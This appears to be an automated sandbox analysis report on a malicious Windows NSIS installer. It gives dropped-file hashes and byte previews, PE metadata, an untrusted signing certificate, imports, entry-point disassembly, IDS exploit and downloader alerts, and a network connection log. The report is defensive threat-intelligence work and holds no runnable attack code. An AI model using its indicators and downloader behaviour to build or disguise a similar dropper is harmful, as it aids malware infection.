                                                                                            • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse
                                                                                            • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                            • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                            • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):148730
                                                                                            Entropy (8bit):4.598675188248196
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:y9OQrEj8U4kB9cgXD9XDikNF8XeOeGlCIk:qOQrEV59cqRXmkb8Xetik
                                                                                            MD5:CAAE91FAF492BB3E385DF013048362C9
                                                                                            SHA1:A947CFC7D3D6B5BC8BFFE1EB8202AF693E66C9FE
                                                                                            SHA-256:97430770B0507F9340934B0A87A622A51A8E27F192A45D4E49A06141CCD50BB5
                                                                                            SHA-512:2DC2C7AAFB05900AD8EEE731E3AC2862C0DF9538323F6471220A83CB7A810DB407EF2574018082CFEB9F5A67ED3D6C8672466E6FC5CF269512595823F06418FB
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.............V..rrrrr...D.................66.....................w.......m....tt...........M.....Z.V....##................................k...^.........22.......0.k.VVV...KK........111......ee.....]..//........*......@@........GG...............W.HH.......#.KK.00.........W......www................&&&&&............pp........vv..O...............@..............9.0.......................................H.~~...............oooo...b..ZZ...??..m...................................uu..nnn.............................777..............gg..................<.f...11.....QQ........V..|.eeee..........O........................ ...g.RRRR..a.........o.........c."""......0........O.ffffff..mm.......WWW.Z.............aaaaa............................&..................)...........>......a....AAAAAAAA..X.........J.................t.....................................lll.(..ww.............................QQQQQ.........dddd......................r......................t....""................0.............e.....
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):362469
                                                                                            Entropy (8bit):7.657032140009134
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:HfdujTlxcFoO+tT3y3dY+V/BfUfd3jqwuNQNbXF0Y1ikdOJWijfymm:H1W/c7QTiRBcfNx5bXFxikhvt
                                                                                            MD5:C10522CB00056035FB012B959A3E15CF
                                                                                            SHA1:F200C40B4811BBF68EF1BFD54A68EA497744FD1C
                                                                                            SHA-256:18C0260445FDCA5E3D5270729115798E1D0A7B74622D92B21A4C3E50B7F96A7B
                                                                                            SHA-512:28CD022F438A2488D695E702027232E3594C735DFAA875012D7605420298D1D2F675B47AFD7971DCF8996736C35C555C975D23FD334D1ED58CB9711BBE682F8C
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:....!..................L.......I...~~~~....llll...^.............e...NNN......f...............Q.........h........FFFF....II....S....................................MM....X............&...........3........................>>>>.........$$....II.....PP.|..........f.....f....~e.....E......_...yu..<?f....../....}.....gg..U.A.Q.....;. =*c..%,[.r.P..n..Bu.......5b........F.....C.j...3...M...t.i...6...+...q.{.....W.z...../}...T..`..o.7:2J......"5B...l....'k..H..K..>.8.......F...?!|m.I....^..-...N....\...../S.($s..j.0..dp.ax..V..........X.Y.r......f.t../.....f....~e.....E......_...yu..w....}........6.....8gg..U.A.Q.....;. =*c..%,[.r.P..n.b........F.....C.j..........?3...M...t.i...6...+...q.{...v}...T..`..o.7:2J......"5B...l....Ww........'k..H..K..>.8....?!|m.I......>x>_..f.r...*..-...N....\...../S.($s..j.0..dp.ax..V.........s.(.6......X.Y.r.z.....f....~e.....E......_...yu..w....}..+..L.....C......gg..U.A.Q.....;. =*c..%,[.r.P..n.b........F.....C.j...3......$1k.
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):371165
                                                                                            Entropy (8bit):1.2513716385265512
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:Sj9TDV4iwR5i6JNPLINN0L+xs+EkTFvjCbJt1zs8kCmx+87wymjP6IzDWZ0rQPyQ:Asy0kRS/GkjABLBfp92S
                                                                                            MD5:C639B5AEA098D21378EFE3AD3A554633
                                                                                            SHA1:0E10CDE4A6AD7B89BB3FD1628C6D025BF466989B
                                                                                            SHA-256:28FA6948793CA0E3C62F408CD9E546169C227B17F96C9CF3B9112E6980A503A1
                                                                                            SHA-512:8312B421FC185D5ECBE5ED3854F9B54589F3142214196DF8EC8DAA71911F06F04283ED9EEA1DE213CD5B03EBA9AB1DDC95F39685E737201519FD9DC5369164EE
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.............q.............................................&.......................\............................................................J]..................................................|...............P..........................................................d......................................................r..........................................................I..................................#...................!..............9...........................................................................6...................................G...........O..........................................................................2...C..................4......................................................................................T...............................X.......................................................................................4.................8.........~...................i......6....+........E.h........g.................{..............&.
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):474733
                                                                                            Entropy (8bit):1.2605066942170449
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:Kps3n4nM/CfcQfsOj6JcTW81rboM0aADXq34CpG0OC:Cenqxv0OBTpQMLo
                                                                                            MD5:D52ECA89A6A6583AA5868C668B52F497
                                                                                            SHA1:82BF52ABA58EDBB83EBB92C01EAAC9CA37189D9F
                                                                                            SHA-256:0ECDFEF080A86A8F200ED06CA6067273A1105F1914DEAE7D92E09B873ABCF83C
                                                                                            SHA-512:6607B8EBB9CC607D3531799052DC6F4F478E4326B5E6E803401E545DD5338815FA80B6E6E61509C1BA2B5719F6A80A681B7EA101540979A4C7D52863D8831E24
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.....a.....................!...........................................................,.............v.............................................}..................G..................................................._..............J................S.........................................................................A........................................................LS3............................................................................E...................................^.........s........ .h.............................&.?...................6..................;............C.....(.............s.....................M......................X.....................n..............................................................................................................:.;....................*.....`......_...................................................f........................................?..........`...U@.......;..............................D.......2........
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                                            Category:dropped
                                                                                            Size (bytes):227593
                                                                                            Entropy (8bit):1.245920806085396
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:3FhKKzByuBwwTbYXu9OgQhU0e6nWp1ZWY4+7j8nc+kf5GfMw1ZK8In+/JNS3xOnr:SepZWYpAGLQIM+q
                                                                                            MD5:9A1B6F2854A5B3F5E97159F4D30C47B3
                                                                                            SHA1:C9B33BDD32498DCCB62D229C95608AD0F8655BA3
                                                                                            SHA-256:6A5ECDC720F8A9DC660732354490F997C5D46C1E7BDF97FE0129D31D5C231021
                                                                                            SHA-512:4F74B2F52F66768B670DD65D42414464630C99637004A7560DDFCB52CEA706A659EA4F382C169DB740B8DD59BC15FE604F0A6F2B3164EE3D09046AAC83C6FD53
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:.......................:............G3........u.......................O..........5...........O...........................................................................................K...................j..1...........[................U....................l...........................................y...........`......................................F........................................................................................................................................................................O...B.......g............E........................................................=.........................9...H........................................L.............................u................................................................................................................4..............................................j..%.....................8............J...........................................................................................v....
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):327412
                                                                                            Entropy (8bit):1.2530468011510671
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:aBILyFjGgwtorVDke1ghsijjk5HkK7lHTeeVybsz2dzpMuDx+Hmoy1f4fZDXCTqJ:94bZ/PRHoZSZdGU6lJ8/fqAGC
                                                                                            MD5:EB81829745DF6650D0C09CBADCADB6FD
                                                                                            SHA1:4FA3AA68D878034C8AAF56013C403A0540B93AF4
                                                                                            SHA-256:9DD8E06CAF3EA5960465EB5466FE13ED3F41FE276C1D7314373ECF3993DFB992
                                                                                            SHA-512:7EFE0B56249B05AFB8AA1C6EFABC773E65D19ABD773F3F462691539F4DCA5AF06B0F7A291FE1E3F4B535A01D7A34E6ACB6C720F0A6C1959FB871635F68463CD3
                                                                                            Malicious:false
                                                                                            Preview:..........i..............................................................................................;............................~...........................F....................._.......n...b........$.............<...........................................................................................^.................................................e...........................J.........................&..................................o................................f..............~...........................................................O.....$.!.................:..................9...9........]...............................................I........................................................N}............4.........................a..T..........g....................................K.............................[......o..............................................................J..........................L.......................;...............................)....
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):364
                                                                                            Entropy (8bit):4.3235645552878115
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:oiK7uqJ3jJ/b1w8IDz5E1WZVpVMmhE4HBFqTZWMWFXijWYBLSWDuPM5iSubpQpZu:oh7uSW68ZVpVekB6ZWMWdgrvDY+inyAT
                                                                                            MD5:C2A47524DCF9687FA180FA2E3F8A4362
                                                                                            SHA1:1C6D3ACC056ECECE019DE3EE9977DA451E4A6379
                                                                                            SHA-256:FDBBF1DFDC69C2B28CFF480273FB9D83A217D699D708105B7166CD0BE5627218
                                                                                            SHA-512:DE30697525C80EE8D1DCE3437374D83A6CA49C8CF11C73BDE2DEB26CA40B1F7ED7298F0871A8F32770C16F8CC944A2072CF4906CF130F50A9F4AB4C30E557E2C
                                                                                            Malicious:false
                                                                                            Preview:sheitan interruptable lsesummen,mercurialising engage rilievo fringe dobbeltdomicilernes chionodoxa chromascope,udreder leveraging lippering.bldsden vagtselskabers dentalized prussianised demifusion nachas..reboards skildvagter versiculi planetarily seksualhygiejnens bryllupsmarchens..strophe transformative unshapenly pharmacopeial afskedshilsners udsalgssteder.
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):264011
                                                                                            Entropy (8bit):1.2602368630758787
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:x1U384UpGgVCi2XHks9XVNargfQMkIRUpbvS2h2BjyujykSAtE1blsA9IiPi9OhW:x1Uz+6EuhMbJkzpAq+Kk0
                                                                                            MD5:D9EB4DA16650571C58C1B347FB8D27F1
                                                                                            SHA1:C02B382B23D249C7FAAF45D8191F64871FA025A5
                                                                                            SHA-256:17A67A6731D1EF2DFE9C0A1E52CA0589968E9F61FF52FBE67B39DC3E39D36CFF
                                                                                            SHA-512:B437679FD218DBC6CDA0C1EA598B597389E34BBAA3DE913CFEC564E226D3D55E84B4290CA076A6DC66E7018EE95AE1EE6007DB19F87DC68B459FCAFAF34D8E9D
                                                                                            Malicious:false
                                                                                            Preview:....o../._r.............................5...E.................................................................................p..............................>R.s....................................M.....R..........................................`.x.........q..............................................................OG.D..........................<.................(....................................................................d...............................n...........................................r....n........................e.....................d.......................................................................g..f..........J.....................................................................L....t..................8.........................................p....f....................................g..............................................D.....C............z..........................................................................................#............
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):438970
                                                                                            Entropy (8bit):1.254355464810577
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bzV5RkJ99odavaG4W/vwV9bW9Iy6F5XTP/BtOax/XXluFr9jT6nHttP+Uf6FAqj3:P/vAoMGFHEUaviFWCDH1M5AOfE
                                                                                            MD5:CA0365FACD33769129F762C843983283
                                                                                            SHA1:E6C95B658A13E598AE6AF5F71A0D577C84BE7B26
                                                                                            SHA-256:C8ED8546722F12C51800EDAEB09F659B59CFA6B8B8E3B0FDC55267A7E5560A20
                                                                                            SHA-512:AE3ED0C51571CC90F65A8E58744E4002302E43B3D40E71C87A0223DEB7E9C5DFD1370C0AB1262E12F900E6A85C5CEA82B115D5EC8697CEF9F5EFAF555D2153C7
                                                                                            Malicious:false
                                                                                            Preview:............................................-..D..2............................................................`................................[...........................................s..........................................................`.......{.......................................i................s........................{..............D.........g......:.....................C...........................................................................................6...................4.-..................................................S............................a......................................................N.+............................................................................................................................................................................_.T.....................................................................................................(...........%............................A.......................................
                                                                                            Process:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):489577
                                                                                            Entropy (8bit):1.2547186421876628
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:E/ujv57uZhomnVCSJm9XbVL7qQ/NAq6gusqocKJjh8zOdV:E/67S/n5mpLH/RusDlT
                                                                                            MD5:917EE012CBF9DD581CA73C76C7FE4CA0
                                                                                            SHA1:0C99AC2CAEED895B940935D72A2A5FD3176D8C85
                                                                                            SHA-256:09B342C70E64D68438917385DD67258EF7C4A2E4D6ED923BC52525A40540698A
                                                                                            SHA-512:AE2552898CA689DE35FC21E6F36E38CF1B2F6CE623B70CA4EF4FF5B18DB863059CBE8EADEEA9A18CEEAD756AC4B25E812F52B012E6E32CBC3F26C18393259324
                                                                                            Malicious:false
                                                                                            Preview:..............v.........................................................................................................................._X......k............b.........J...................................X....................................................................................................|........Z..........................].............................................:...*......#.........................................................*.....................................................O..............................O..................................................................................E............................U........................................E........................................:........D..................................................g...Q.................................................................................z..=........................E..%............................................................................*..........
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.9860949783455135
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:3Pd480eWHA.exe
                                                                                            File size:895'816 bytes
                                                                                            MD5:c91d3b24dd89ae81099db451a512ba38
                                                                                            SHA1:9d69cf3aafd3743216ea9d3777be0e2528c9b6ce
                                                                                            SHA256:0c2b883b2bff3ab75adf1d79049fffe5de810c19cb65e1b3a4e14d73ca10598c
                                                                                            SHA512:20a5821498fbec437359b8d99e3435958f99ecfcc94ccfba93045c185b7349e493b607f24453c5561b922325e3090108af7cad44057408e90b4e0b3af8eab5fb
                                                                                            SSDEEP:24576:sDe1Kph66KEQBL5c2rDruMRNemtMhAdBvheI+op15CQN08KXQoGxA:UNpRKRPc2tRwSMhA7j+HQk98A
                                                                                            TLSH:9E15232211ED4537F26BF8308D7F1A1B1E731D440621D1779B203ABD793CA6ABB6942E
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....
                                                                                            Icon Hash:43caa1a1a185ada9
                                                                                            Entrypoint:0x4030ec
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=Inornate, O=Inornate, L=Zenting, C=DE
                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                            Error Number:-2146762487
                                                                                            Not Before, Not After
                                                                                            • 12/11/2023 09:24:13 11/11/2026 09:24:13
                                                                                            Subject Chain
                                                                                            • CN=Inornate, O=Inornate, L=Zenting, C=DE
                                                                                            Version:3
                                                                                            Thumbprint MD5:31A645BBA85D4E0216CE40257D6115B0
                                                                                            Thumbprint SHA-1:993AA4897A5D2B87ED0FDA6D3F7240C183FC8888
                                                                                            Thumbprint SHA-256:E0F1ED949DFB36C6F736597AED4CC48002C56DB2FE12B43590C4BB5E0CD53889
                                                                                            Serial:785C7C3BD8D7982DF661ACB45FBC4E7F45428B38
                                                                                            Instruction
                                                                                            sub esp, 00000184h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409198h
                                                                                            mov dword ptr [esp+20h], ebx
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [004070A8h]
                                                                                            call dword ptr [004070A4h]
                                                                                            cmp ax, 00000006h
                                                                                            je 00007FDCC0DC39A3h
                                                                                            push ebx
                                                                                            call 00007FDCC0DC6911h
                                                                                            cmp eax, ebx
                                                                                            je 00007FDCC0DC3999h
                                                                                            push 00000C00h
                                                                                            call eax
                                                                                            mov esi, 00407298h
                                                                                            push esi
                                                                                            call 00007FDCC0DC688Dh
                                                                                            push esi
                                                                                            call dword ptr [004070A0h]
                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                            cmp byte ptr [esi], bl
                                                                                            jne 00007FDCC0DC397Dh
                                                                                            push ebp
                                                                                            push 00000009h
                                                                                            call 00007FDCC0DC68E4h
                                                                                            push 00000007h
                                                                                            call 00007FDCC0DC68DDh
                                                                                            mov dword ptr [007A1F44h], eax
                                                                                            call dword ptr [00407044h]
                                                                                            push ebx
                                                                                            call dword ptr [00407288h]
                                                                                            mov dword ptr [007A1FF8h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+38h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 0079D500h
                                                                                            call dword ptr [00407174h]
                                                                                            push 00409188h
                                                                                            push 007A1740h
                                                                                            call 00007FDCC0DC6507h
                                                                                            call dword ptr [0040709Ch]
                                                                                            mov ebp, 007A8000h
                                                                                            push eax
                                                                                            push ebp
                                                                                            call 00007FDCC0DC64F5h
                                                                                            push ebx
                                                                                            call dword ptr [00407154h]
                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3be0000xe18.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xd99680x11e0.data
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x5db60x5e00f367801e476b699be2b532039e0b583cFalse0.6806848404255319data6.508470969322742IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x90000x3990380x40029ebcbec0bd7bd0fecb3d2937195c560unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x3a30000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x3be0000xe180x1000bfb4537f3eb7566a74ccdeac7c775284False0.352783203125data3.842480295105669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x3be2080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23655913978494625
                                                                                            RT_DIALOG0x3be4f00x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x3be5f00x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x3be7100xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x3be7d80x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x3be8380x14dataEnglishUnited States1.15
                                                                                            RT_VERSION0x3be8500x288dataEnglishUnited States0.5108024691358025
                                                                                            RT_MANIFEST0x3bead80x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153
                                                                                            DLLImport
                                                                                            KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                            ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-06T15:06:21.524123+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.749740TCP
                                                                                            2024-11-06T15:07:01.749231+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749956TCP
                                                                                            2024-11-06T15:07:14.059270+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749974172.217.16.206443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 6, 2024 15:07:12.631062984 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:12.631123066 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:12.631407022 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:12.713534117 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:12.713551044 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:13.571036100 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:13.571190119 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:13.571890116 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:13.572010994 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:13.675777912 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:13.675797939 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:13.676156998 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:13.676251888 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:13.696116924 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:13.743328094 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.059266090 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.059559107 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:14.059572935 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.060030937 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:14.081166983 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:14.081209898 CET44349974172.217.16.206192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.081332922 CET49974443192.168.2.7172.217.16.206
                                                                                            Nov 6, 2024 15:07:14.284621000 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:14.284660101 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:14.284745932 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:14.285253048 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:14.285264969 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:15.171181917 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:15.171330929 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:15.176062107 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:15.176084042 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:15.176331997 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:15.176424026 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:15.181937933 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:15.227341890 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:17.828809023 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:17.828876019 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:17.828881025 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:17.828907967 CET44349975142.250.186.129192.168.2.7
                                                                                            Nov 6, 2024 15:07:17.828927994 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:17.828948975 CET49975443192.168.2.7142.250.186.129
                                                                                            Nov 6, 2024 15:07:17.930990934 CET44349975142.250.186.129192.168.2.7
